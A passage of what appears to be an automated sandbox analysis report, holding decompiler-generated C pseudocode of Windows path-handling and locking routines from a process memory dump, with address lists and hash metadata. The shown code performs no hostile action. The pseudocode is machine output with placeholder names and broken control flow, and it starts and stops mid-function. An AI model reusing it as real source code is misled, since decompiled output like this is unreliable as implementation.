                        				signed int _t213;
                        				signed int _t225;
                        				short _t233;
                        				signed char _t234;
                        				signed int _t242;
                        				signed int _t243;
                        				signed int _t244;
                        				signed int _t245;
                        				signed int _t250;
                        				void* _t251;
                        				signed short* _t254;
                        				void* _t255;
                        				signed int _t256;
                        				void* _t257;
                        				signed short* _t260;
                        				signed short _t265;
                        				signed short* _t269;
                        				signed short _t271;
                        				signed short** _t272;
                        				signed short* _t275;
                        				signed short _t282;
                        				signed short _t283;
                        				signed short _t290;
                        				signed short _t299;
                        				signed short _t307;
                        				signed int _t308;
                        				signed short _t311;
                        				signed short* _t315;
                        				signed short _t316;
                        				void* _t317;
                        				void* _t319;
                        				signed short* _t321;
                        				void* _t322;
                        				void* _t323;
                        				unsigned int _t324;
                        				signed int _t325;
                        				void* _t326;
                        				signed int _t327;
                        				signed int _t329;
                        
                        				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                        				_v8 =  *0x2c8d360 ^ _t329;
                        				_t157 = _a8;
                        				_t321 = _a4;
                        				_t315 = __edx;
                        				_v548 = __ecx;
                        				_t305 = _a20;
                        				_v560 = _a12;
                        				_t260 = _a16;
                        				_v564 = __edx;
                        				_v580 = _a8;
                        				_v572 = _t260;
                        				_v544 = _a20;
                        				if( *__edx <= 8) {
                        					L3:
                        					if(_t260 != 0) {
                        						 *_t260 = 0;
                        					}
                        					_t254 =  &_v532;
                        					_v588 = 0x208;
                        					if((_v548 & 0x00000001) != 0) {
                        						_v556 =  *_t315;
                        						_v552 = _t315[2];
                        						_t161 = E02BCF232( &_v556);
                        						_t316 = _v556;
                        						_v540 = _t161;
                        						goto L17;
                        					} else {
                        						_t306 = 0x208;
                        						_t298 = _t315;
                        						_t316 = E02BB6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                        						if(_t316 == 0) {
                        							L68:
                        							_t322 = 0xc0000033;
                        							goto L39;
                        						} else {
                        							while(_v581 == 0) {
                        								_t233 = _v588;
                        								if(_t316 > _t233) {
                        									_t234 = _v548;
                        									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                        										_t254 = L02BB4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                        										if(_t254 == 0) {
                        											_t169 = 0xc0000017;
                        										} else {
                        											_t298 = _v564;
                        											_v588 = _t316;
                        											_t306 = _t316;
                        											_t316 = E02BB6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                        											if(_t316 != 0) {
                        												continue;
                        											} else {
                        												goto L68;
                        											}
                        										}
                        									} else {
                        										goto L90;
                        									}
                        								} else {
                        									_v556 = _t316;
                        									 *((short*)(_t329 + 0x32)) = _t233;
                        									_v552 = _t254;
                        									if(_t316 < 2) {
                        										L11:
                        										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                        											_t161 = 5;
                        										} else {
                        											if(_t316 < 6) {
                        												L87:
                        												_t161 = 3;
                        											} else {
                        												_t242 = _t254[2] & 0x0000ffff;
                        												if(_t242 != 0x5c) {
                        													if(_t242 == 0x2f) {
                        														goto L16;
                        													} else {
                        														goto L87;
                        													}
                        													goto L101;
                        												} else {
                        													L16:
                        													_t161 = 2;
                        												}
                        											}
                        										}
                        									} else {
                        										_t243 =  *_t254 & 0x0000ffff;
                        										if(_t243 == 0x5c || _t243 == 0x2f) {
                        											if(_t316 < 4) {
                        												L81:
                        												_t161 = 4;
                        												goto L17;
                        											} else {
                        												_t244 = _t254[1] & 0x0000ffff;
                        												if(_t244 != 0x5c) {
                        													if(_t244 == 0x2f) {
                        														goto L60;
                        													} else {
                        														goto L81;
                        													}
                        												} else {
                        													L60:
                        													if(_t316 < 6) {
                        														L83:
                        														_t161 = 1;
                        														goto L17;
                        													} else {
                        														_t245 = _t254[2] & 0x0000ffff;
                        														if(_t245 != 0x2e) {
                        															if(_t245 == 0x3f) {
                        																goto L62;
                        															} else {
                        																goto L83;
                        															}
                        														} else {
                        															L62:
                        															if(_t316 < 8) {
                        																L85:
                        																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                        																goto L17;
                        															} else {
                        																_t250 = _t254[3] & 0x0000ffff;
                        																if(_t250 != 0x5c) {
                        																	if(_t250 == 0x2f) {
                        																		goto L64;
                        																	} else {
                        																		goto L85;
                        																	}
                        																} else {
                        																	L64:
                        																	_t161 = 6;
                        																	goto L17;
                        																}
                        															}
                        														}
                        													}
                        												}
                        											}
                        											goto L101;
                        										} else {
                        											goto L11;
                        										}
                        									}
                        									L17:
                        									if(_t161 != 2) {
                        										_t162 = _t161 - 1;
                        										if(_t162 > 5) {
                        											goto L18;
                        										} else {
                        											switch( *((intOrPtr*)(_t162 * 4 +  &M02BB45F8))) {
                        												case 0:
                        													_v568 = 0x2b71078;
                        													__eax = 2;
                        													goto L20;
                        												case 1:
                        													goto L18;
                        												case 2:
                        													_t163 = 4;
                        													goto L19;
                        											}
                        										}
                        										goto L41;
                        									} else {
                        										L18:
                        										_t163 = 0;
                        										L19:
                        										_v568 = 0x2b711c4;
                        									}
                        									L20:
                        									_v588 = _t163;
                        									_v564 = _t163 + _t163;
                        									_t306 =  *_v568 & 0x0000ffff;
                        									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                        									_v576 = _t265;
                        									if(_t265 > 0xfffe) {
                        										L90:
                        										_t322 = 0xc0000106;
                        									} else {
                        										if(_t321 != 0) {
                        											if(_t265 > (_t321[1] & 0x0000ffff)) {
                        												if(_v580 != 0) {
                        													goto L23;
                        												} else {
                        													_t322 = 0xc0000106;
                        													goto L39;
                        												}
                        											} else {
                        												_t177 = _t306;
                        												goto L25;
                        											}
                        											goto L101;
                        										} else {
                        											if(_v580 == _t321) {
                        												_t322 = 0xc000000d;
                        											} else {
                        												L23:
                        												_t173 = L02BB4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                        												_t269 = _v592;
                        												_t269[2] = _t173;
                        												if(_t173 == 0) {
                        													_t322 = 0xc0000017;
                        												} else {
                        													_t316 = _v556;
                        													 *_t269 = 0;
                        													_t321 = _t269;
                        													_t269[1] = _v576;
                        													_t177 =  *_v568 & 0x0000ffff;
                        													L25:
                        													_v580 = _t177;
                        													if(_t177 == 0) {
                        														L29:
                        														_t307 =  *_t321 & 0x0000ffff;
                        													} else {
                        														_t290 =  *_t321 & 0x0000ffff;
                        														_v576 = _t290;
                        														_t310 = _t177 & 0x0000ffff;
                        														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                        															_t307 =  *_t321 & 0xffff;
                        														} else {
                        															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                        															E02BDF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                        															_t329 = _t329 + 0xc;
                        															_t311 = _v580;
                        															_t225 =  *_t321 + _t311 & 0x0000ffff;
                        															 *_t321 = _t225;
                        															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                        																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                        															}
                        															goto L29;
                        														}
                        													}
                        													_t271 = _v556 - _v588 + _v588;
                        													_v580 = _t307;
                        													_v576 = _t271;
                        													if(_t271 != 0) {
                        														_t308 = _t271 & 0x0000ffff;
                        														_v588 = _t308;
                        														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                        															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                        															E02BDF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                        															_t329 = _t329 + 0xc;
                        															_t213 =  *_t321 + _v576 & 0x0000ffff;
                        															 *_t321 = _t213;
                        															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                        																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                        															}
                        														}
                        													}
                        													_t272 = _v560;
                        													if(_t272 != 0) {
                        														 *_t272 = _t321;
                        													}
                        													_t306 = 0;
                        													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                        													_t275 = _v572;
                        													if(_t275 != 0) {
                        														_t306 =  *_t275;
                        														if(_t306 != 0) {
                        															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                        														}
                        													}
                        													_t181 = _v544;
                        													if(_t181 != 0) {
                        														 *_t181 = 0;
                        														 *((intOrPtr*)(_t181 + 4)) = 0;
                        														 *((intOrPtr*)(_t181 + 8)) = 0;
                        														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                        														if(_v540 == 5) {
                        															_t182 = E02B952A5(1);
                        															_v588 = _t182;
                        															if(_t182 == 0) {
                        																E02BAEB70(1, 0x2c879a0);
                        																goto L38;
                        															} else {
                        																_v560 = _t182 + 0xc;
                        																_t185 = E02BAAA20( &_v556, _t182 + 0xc,  &_v556, 1);
                        																if(_t185 == 0) {
                        																	_t324 = _v588;
                        																	goto L97;
                        																} else {
                        																	_t306 = _v544;
                        																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                        																	 *(_t306 + 4) = _t282;
                        																	_v576 = _t282;
                        																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                        																	 *_t306 = _t325;
                        																	if( *_t282 == 0x5c) {
                        																		_t149 = _t325 - 2; // -2
                        																		_t283 = _t149;
                        																		 *_t306 = _t283;
                        																		 *(_t306 + 4) = _v576 + 2;
                        																		_t185 = _t283 & 0x0000ffff;
                        																	}
                        																	_t324 = _v588;
                        																	 *(_t306 + 2) = _t185;
                        																	if((_v548 & 0x00000002) == 0) {
                        																		L97:
                        																		asm("lock xadd [esi], eax");
                        																		if((_t185 | 0xffffffff) == 0) {
                        																			_push( *((intOrPtr*)(_t324 + 4)));
                        																			E02BD95D0();
                        																			L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                        																		}
                        																	} else {
                        																		 *(_t306 + 0xc) = _t324;
                        																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                        																	}
                        																	goto L38;
                        																}
                        															}
                        															goto L41;
                        														}
                        													}
                        													L38:
                        													_t322 = 0;
                        												}
                        											}
                        										}
                        									}
                        									L39:
                        									if(_t254 !=  &_v532) {
                        										L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                        									}
                        									_t169 = _t322;
                        								}
                        								goto L41;
                        							}
                        							goto L68;
                        						}
                        					}
                        					L41:
                        					_pop(_t317);
                        					_pop(_t323);
                        					_pop(_t255);
                        					return E02BDB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                        				} else {
                        					_t299 = __edx[2];
                        					if( *_t299 == 0x5c) {
                        						_t256 =  *(_t299 + 2) & 0x0000ffff;
                        						if(_t256 != 0x5c) {
                        							if(_t256 != 0x3f) {
                        								goto L2;
                        							} else {
                        								goto L50;
                        							}
                        						} else {
                        							L50:
                        							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                        								goto L2;
                        							} else {
                        								_t251 = E02BD3D43(_t315, _t321, _t157, _v560, _v572, _t305);
                        								_pop(_t319);
                        								_pop(_t326);
                        								_pop(_t257);
                        								return E02BDB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                        							}
                        						}
                        					} else {
                        						L2:
                        						_t260 = _v572;
                        						goto L3;
                        					}
                        				}
                        				L101:
                        			}















































































                        0x02bb4128
                        0x02bb4135
                        0x02bb413c
                        0x02bb4141
                        0x02bb4145
                        0x02bb4147
                        0x02bb414e
                        0x02bb4151
                        0x02bb4159
                        0x02bb415c
                        0x02bb4160
                        0x02bb4164
                        0x02bb4168
                        0x02bb416c
                        0x02bb417f
                        0x02bb4181
                        0x02bb446a
                        0x02bb446a
                        0x02bb418c
                        0x02bb4195
                        0x02bb4199
                        0x02bb4432
                        0x02bb4439
                        0x02bb443d
                        0x02bb4442
                        0x02bb4447
                        0x00000000
                        0x02bb419f
                        0x02bb41a3
                        0x02bb41b1
                        0x02bb41b9
                        0x02bb41bd
                        0x02bb45db
                        0x02bb45db
                        0x00000000
                        0x02bb41c3
                        0x02bb41c3
                        0x02bb41ce
                        0x02bb41d4
                        0x02bfe138
                        0x02bfe13e
                        0x02bfe169
                        0x02bfe16d
                        0x02bfe19e
                        0x02bfe16f
                        0x02bfe16f
                        0x02bfe175
                        0x02bfe179
                        0x02bfe18f
                        0x02bfe193
                        0x00000000
                        0x02bfe199
                        0x00000000
                        0x02bfe199
                        0x02bfe193
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bb41da
                        0x02bb41da
                        0x02bb41df
                        0x02bb41e4
                        0x02bb41ec
                        0x02bb4203
                        0x02bb4207
                        0x02bfe1fd
                        0x02bb4222
                        0x02bb4226
                        0x02bfe1f3
                        0x02bfe1f3
                        0x02bb422c
                        0x02bb422c
                        0x02bb4233
                        0x02bfe1ed
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bb4239
                        0x02bb4239
                        0x02bb4239
                        0x02bb4239
                        0x02bb4233
                        0x02bb4226
                        0x02bb41ee
                        0x02bb41ee
                        0x02bb41f4
                        0x02bb4575
                        0x02bfe1b1
                        0x02bfe1b1
                        0x00000000
                        0x02bb457b
                        0x02bb457b
                        0x02bb4582
                        0x02bfe1ab
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bb4588
                        0x02bb4588
                        0x02bb458c
                        0x02bfe1c4
                        0x02bfe1c4
                        0x00000000
                        0x02bb4592
                        0x02bb4592
                        0x02bb4599
                        0x02bfe1be
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bb459f
                        0x02bb459f
                        0x02bb45a3
                        0x02bfe1d7
                        0x02bfe1e4
                        0x00000000
                        0x02bb45a9
                        0x02bb45a9
                        0x02bb45b0
                        0x02bfe1d1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bb45b6
                        0x02bb45b6
                        0x02bb45b6
                        0x00000000
                        0x02bb45b6
                        0x02bb45b0
                        0x02bb45a3
                        0x02bb4599
                        0x02bb458c
                        0x02bb4582
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bb41f4
                        0x02bb423e
                        0x02bb4241
                        0x02bb45c0
                        0x02bb45c4
                        0x00000000
                        0x02bb45ca
                        0x02bb45ca
                        0x00000000
                        0x02bfe207
                        0x02bfe20f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bb45d1
                        0x00000000
                        0x00000000
                        0x02bb45ca
                        0x00000000
                        0x02bb4247
                        0x02bb4247
                        0x02bb4247
                        0x02bb4249
                        0x02bb4249
                        0x02bb4249
                        0x02bb4251
                        0x02bb4251
                        0x02bb4257
                        0x02bb425f
                        0x02bb426e
                        0x02bb4270
                        0x02bb427a
                        0x02bfe219
                        0x02bfe219
                        0x02bb4280
                        0x02bb4282
                        0x02bb4456
                        0x02bb45ea
                        0x00000000
                        0x02bb45f0
                        0x02bfe223
                        0x00000000
                        0x02bfe223
                        0x02bb445c
                        0x02bb445c
                        0x00000000
                        0x02bb445c
                        0x00000000
                        0x02bb4288
                        0x02bb428c
                        0x02bfe298
                        0x02bb4292
                        0x02bb4292
                        0x02bb429e
                        0x02bb42a3
                        0x02bb42a7
                        0x02bb42ac
                        0x02bfe22d
                        0x02bb42b2
                        0x02bb42b2
                        0x02bb42b9
                        0x02bb42bc
                        0x02bb42c2
                        0x02bb42ca
                        0x02bb42cd
                        0x02bb42cd
                        0x02bb42d4
                        0x02bb433f
                        0x02bb433f
                        0x02bb42d6
                        0x02bb42d6
                        0x02bb42d9
                        0x02bb42dd
                        0x02bb42eb
                        0x02bfe23a
                        0x02bb42f1
                        0x02bb4305
                        0x02bb430d
                        0x02bb4315
                        0x02bb4318
                        0x02bb431f
                        0x02bb4322
                        0x02bb432e
                        0x02bb433b
                        0x02bb433b
                        0x00000000
                        0x02bb432e
                        0x02bb42eb
                        0x02bb434c
                        0x02bb434e
                        0x02bb4352
                        0x02bb4359
                        0x02bb435e
                        0x02bb4361
                        0x02bb436e
                        0x02bb438a
                        0x02bb438e
                        0x02bb4396
                        0x02bb439e
                        0x02bb43a1
                        0x02bb43ad
                        0x02bb43bb
                        0x02bb43bb
                        0x02bb43ad
                        0x02bb436e
                        0x02bb43bf
                        0x02bb43c5
                        0x02bb4463
                        0x02bb4463
                        0x02bb43ce
                        0x02bb43d5
                        0x02bb43d9
                        0x02bb43df
                        0x02bb4475
                        0x02bb4479
                        0x02bb4491
                        0x02bb4491
                        0x02bb4479
                        0x02bb43e5
                        0x02bb43eb
                        0x02bb43f4
                        0x02bb43f6
                        0x02bb43f9
                        0x02bb43fc
                        0x02bb43ff
                        0x02bb44e8
                        0x02bb44ed
                        0x02bb44f3
                        0x02bfe247
                        0x00000000
                        0x02bb44f9
                        0x02bb4504
                        0x02bb4508
                        0x02bb450f
                        0x02bfe269
                        0x00000000
                        0x02bb4515
                        0x02bb4519
                        0x02bb4531
                        0x02bb4534
                        0x02bb4537
                        0x02bb453e
                        0x02bb4541
                        0x02bb454a
                        0x02bfe255
                        0x02bfe255
                        0x02bfe25b
                        0x02bfe25e
                        0x02bfe261
                        0x02bfe261
                        0x02bb4555
                        0x02bb4559
                        0x02bb455d
                        0x02bfe26d
                        0x02bfe270
                        0x02bfe274
                        0x02bfe27a
                        0x02bfe27d
                        0x02bfe28e
                        0x02bfe28e
                        0x02bb4563
                        0x02bb4563
                        0x02bb4569
                        0x02bb4569
                        0x00000000
                        0x02bb455d
                        0x02bb450f
                        0x00000000
                        0x02bb44f3
                        0x02bb43ff
                        0x02bb4405
                        0x02bb4405
                        0x02bb4405
                        0x02bb42ac
                        0x02bb428c
                        0x02bb4282
                        0x02bb4407
                        0x02bb440d
                        0x02bfe2af
                        0x02bfe2af
                        0x02bb4413
                        0x02bb4413
                        0x00000000
                        0x02bb41d4
                        0x00000000
                        0x02bb41c3
                        0x02bb41bd
                        0x02bb4415
                        0x02bb4415
                        0x02bb4416
                        0x02bb4417
                        0x02bb4429
                        0x02bb416e
                        0x02bb416e
                        0x02bb4175
                        0x02bb4498
                        0x02bb449f
                        0x02bfe12d
                        0x00000000
                        0x02bfe133
                        0x00000000
                        0x02bfe133
                        0x02bb44a5
                        0x02bb44a5
                        0x02bb44aa
                        0x00000000
                        0x02bb44bb
                        0x02bb44ca
                        0x02bb44d6
                        0x02bb44d7
                        0x02bb44d8
                        0x02bb44e3
                        0x02bb44e3
                        0x02bb44aa
                        0x02bb417b
                        0x02bb417b
                        0x02bb417b
                        0x00000000
                        0x02bb417b
                        0x02bb4175
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4df8cf94bb2acd3fb1532255901262955a49d1636eafb7387d2c1fc98e43ba97
                        • Instruction ID: b6ac48e701d3de77a6665e7ab6f2d0f087ebb1346e9bb62874ce0854198c99cd
                        • Opcode Fuzzy Hash: 4df8cf94bb2acd3fb1532255901262955a49d1636eafb7387d2c1fc98e43ba97
                        • Instruction Fuzzy Hash: EDF17E706082118FC765CF19C490ABAB7F1FF88708F1489AEF586CB261E774D995CB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E02BC20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                        				signed int _v16;
                        				signed int _v20;
                        				signed char _v24;
                        				intOrPtr _v28;
                        				signed int _v32;
                        				void* _v36;
                        				char _v48;
                        				signed int _v52;
                        				signed int _v56;
                        				unsigned int _v60;
                        				char _v64;
                        				unsigned int _v68;
                        				signed int _v72;
                        				char _v73;
                        				signed int _v74;
                        				char _v75;
                        				signed int _v76;
                        				void* _v81;
                        				void* _v82;
                        				void* _v89;
                        				void* _v92;
                        				void* _v97;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed char _t128;
                        				void* _t129;
                        				signed int _t130;
                        				void* _t132;
                        				signed char _t133;
                        				intOrPtr _t135;
                        				signed int _t137;
                        				signed int _t140;
                        				signed int* _t144;
                        				signed int* _t145;
                        				intOrPtr _t146;
                        				signed int _t147;
                        				signed char* _t148;
                        				signed int _t149;
                        				signed int _t153;
                        				signed int _t169;
                        				signed int _t174;
                        				signed int _t180;
                        				void* _t197;
                        				void* _t198;
                        				signed int _t201;
                        				intOrPtr* _t202;
                        				intOrPtr* _t205;
                        				signed int _t210;
                        				signed int _t215;
                        				signed int _t218;
                        				signed char _t221;
                        				signed int _t226;
                        				char _t227;
                        				signed int _t228;
                        				void* _t229;
                        				unsigned int _t231;
                        				void* _t235;
                        				signed int _t240;
                        				signed int _t241;
                        				void* _t242;
                        				signed int _t246;
                        				signed int _t248;
                        				signed int _t252;
                        				signed int _t253;
                        				void* _t254;
                        				intOrPtr* _t256;
                        				intOrPtr _t257;
                        				unsigned int _t262;
                        				signed int _t265;
                        				void* _t267;
                        				signed int _t275;
                        
                        				_t198 = __ebx;
                        				_t267 = (_t265 & 0xfffffff0) - 0x48;
                        				_v68 = __ecx;
                        				_v73 = 0;
                        				_t201 = __edx & 0x00002000;
                        				_t128 = __edx & 0xffffdfff;
                        				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                        				_v72 = _t128;
                        				if((_t128 & 0x00000008) != 0) {
                        					__eflags = _t128 - 8;
                        					if(_t128 != 8) {
                        						L69:
                        						_t129 = 0xc000000d;
                        						goto L23;
                        					} else {
                        						_t130 = 0;
                        						_v72 = 0;
                        						_v75 = 1;
                        						L2:
                        						_v74 = 1;
                        						_t226 =  *0x2c88714; // 0x0
                        						if(_t226 != 0) {
                        							__eflags = _t201;
                        							if(_t201 != 0) {
                        								L62:
                        								_v74 = 1;
                        								L63:
                        								_t130 = _t226 & 0xffffdfff;
                        								_v72 = _t130;
                        								goto L3;
                        							}
                        							_v74 = _t201;
                        							__eflags = _t226 & 0x00002000;
                        							if((_t226 & 0x00002000) == 0) {
                        								goto L63;
                        							}
                        							goto L62;
                        						}
                        						L3:
                        						_t227 = _v75;
                        						L4:
                        						_t240 = 0;
                        						_v56 = 0;
                        						_t252 = _t130 & 0x00000100;
                        						if(_t252 != 0 || _t227 != 0) {
                        							_t240 = _v68;
                        							_t132 = E02BC2EB0(_t240);
                        							__eflags = _t132 - 2;
                        							if(_t132 != 2) {
                        								__eflags = _t132 - 1;
                        								if(_t132 == 1) {
                        									goto L25;
                        								}
                        								__eflags = _t132 - 6;
                        								if(_t132 == 6) {
                        									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                        									if( *((short*)(_t240 + 4)) != 0x3f) {
                        										goto L40;
                        									}
                        									_t197 = E02BC2EB0(_t240 + 8);
                        									__eflags = _t197 - 2;
                        									if(_t197 == 2) {
                        										goto L25;
                        									}
                        								}
                        								L40:
                        								_t133 = 1;
                        								L26:
                        								_t228 = _v75;
                        								_v56 = _t240;
                        								__eflags = _t133;
                        								if(_t133 != 0) {
                        									__eflags = _t228;
                        									if(_t228 == 0) {
                        										L43:
                        										__eflags = _v72;
                        										if(_v72 == 0) {
                        											goto L8;
                        										}
                        										goto L69;
                        									}
                        									_t133 = E02B958EC(_t240);
                        									_t221 =  *0x2c85cac; // 0x16
                        									__eflags = _t221 & 0x00000040;
                        									if((_t221 & 0x00000040) != 0) {
                        										_t228 = 0;
                        										__eflags = _t252;
                        										if(_t252 != 0) {
                        											goto L43;
                        										}
                        										_t133 = _v72;
                        										goto L7;
                        									}
                        									goto L43;
                        								} else {
                        									_t133 = _v72;
                        									goto L6;
                        								}
                        							}
                        							L25:
                        							_t133 = _v73;
                        							goto L26;
                        						} else {
                        							L6:
                        							_t221 =  *0x2c85cac; // 0x16
                        							L7:
                        							if(_t133 != 0) {
                        								__eflags = _t133 & 0x00001000;
                        								if((_t133 & 0x00001000) != 0) {
                        									_t133 = _t133 | 0x00000a00;
                        									__eflags = _t221 & 0x00000004;
                        									if((_t221 & 0x00000004) != 0) {
                        										_t133 = _t133 | 0x00000400;
                        									}
                        								}
                        								__eflags = _t228;
                        								if(_t228 != 0) {
                        									_t133 = _t133 | 0x00000100;
                        								}
                        								_t229 = E02BD4A2C(0x2c86e40, 0x2bd4b30, _t133, _t240);
                        								__eflags = _t229;
                        								if(_t229 == 0) {
                        									_t202 = _a20;
                        									goto L100;
                        								} else {
                        									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                        									L15:
                        									_t202 = _a20;
                        									 *_t202 = _t135;
                        									if(_t229 == 0) {
                        										L100:
                        										 *_a4 = 0;
                        										_t137 = _a8;
                        										__eflags = _t137;
                        										if(_t137 != 0) {
                        											 *_t137 = 0;
                        										}
                        										 *_t202 = 0;
                        										_t129 = 0xc0000017;
                        										goto L23;
                        									} else {
                        										_t242 = _a16;
                        										if(_t242 != 0) {
                        											_t254 = _t229;
                        											memcpy(_t242, _t254, 0xd << 2);
                        											_t267 = _t267 + 0xc;
                        											_t242 = _t254 + 0x1a;
                        										}
                        										_t205 = _a4;
                        										_t25 = _t229 + 0x48; // 0x48
                        										 *_t205 = _t25;
                        										_t140 = _a8;
                        										if(_t140 != 0) {
                        											__eflags =  *((char*)(_t267 + 0xa));
                        											if( *((char*)(_t267 + 0xa)) != 0) {
                        												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                        											} else {
                        												 *_t140 = 0;
                        											}
                        										}
                        										_t256 = _a12;
                        										if(_t256 != 0) {
                        											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                        										}
                        										_t257 =  *_t205;
                        										_v48 = 0;
                        										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                        										_v56 = 0;
                        										_v52 = 0;
                        										_t144 =  *( *[fs:0x30] + 0x50);
                        										if(_t144 != 0) {
                        											__eflags =  *_t144;
                        											if( *_t144 == 0) {
                        												goto L20;
                        											}
                        											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                        											goto L21;
                        										} else {
                        											L20:
                        											_t145 = 0x7ffe0384;
                        											L21:
                        											if( *_t145 != 0) {
                        												_t146 =  *[fs:0x30];
                        												__eflags =  *(_t146 + 0x240) & 0x00000004;
                        												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                        													_t147 = E02BB7D50();
                        													__eflags = _t147;
                        													if(_t147 == 0) {
                        														_t148 = 0x7ffe0385;
                        													} else {
                        														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                        													}
                        													__eflags =  *_t148 & 0x00000020;
                        													if(( *_t148 & 0x00000020) != 0) {
                        														_t149 = _v72;
                        														__eflags = _t149;
                        														if(__eflags == 0) {
                        															_t149 = 0x2b75c80;
                        														}
                        														_push(_t149);
                        														_push( &_v48);
                        														 *((char*)(_t267 + 0xb)) = E02BCF6E0(_t198, _t242, _t257, __eflags);
                        														_push(_t257);
                        														_push( &_v64);
                        														_t153 = E02BCF6E0(_t198, _t242, _t257, __eflags);
                        														__eflags =  *((char*)(_t267 + 0xb));
                        														if( *((char*)(_t267 + 0xb)) != 0) {
                        															__eflags = _t153;
                        															if(_t153 != 0) {
                        																__eflags = 0;
                        																E02C17016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                        																L02BB2400(_t267 + 0x20);
                        															}
                        															L02BB2400( &_v64);
                        														}
                        													}
                        												}
                        											}
                        											_t129 = 0;
                        											L23:
                        											return _t129;
                        										}
                        									}
                        								}
                        							}
                        							L8:
                        							_t275 = _t240;
                        							if(_t275 != 0) {
                        								_v73 = 0;
                        								_t253 = 0;
                        								__eflags = 0;
                        								L29:
                        								_push(0);
                        								_t241 = E02BC2397(_t240);
                        								__eflags = _t241;
                        								if(_t241 == 0) {
                        									_t229 = 0;
                        									L14:
                        									_t135 = 0;
                        									goto L15;
                        								}
                        								__eflags =  *((char*)(_t267 + 0xb));
                        								 *(_t241 + 0x34) = 1;
                        								if( *((char*)(_t267 + 0xb)) != 0) {
                        									E02BB2280(_t134, 0x2c88608);
                        									__eflags =  *0x2c86e48 - _t253; // 0x2734d28
                        									if(__eflags != 0) {
                        										L48:
                        										_t253 = 0;
                        										__eflags = 0;
                        										L49:
                        										E02BAFFB0(_t198, _t241, 0x2c88608);
                        										__eflags = _t253;
                        										if(_t253 != 0) {
                        											L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                        										}
                        										goto L31;
                        									}
                        									 *0x2c86e48 = _t241;
                        									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                        									__eflags = _t253;
                        									if(_t253 != 0) {
                        										_t57 = _t253 + 0x34;
                        										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                        										__eflags =  *_t57;
                        										if( *_t57 == 0) {
                        											goto L49;
                        										}
                        									}
                        									goto L48;
                        								}
                        								L31:
                        								_t229 = _t241;
                        								goto L14;
                        							}
                        							_v73 = 1;
                        							_v64 = _t240;
                        							asm("lock bts dword [esi], 0x0");
                        							if(_t275 < 0) {
                        								_t231 =  *0x2c88608; // 0x0
                        								while(1) {
                        									_v60 = _t231;
                        									__eflags = _t231 & 0x00000001;
                        									if((_t231 & 0x00000001) != 0) {
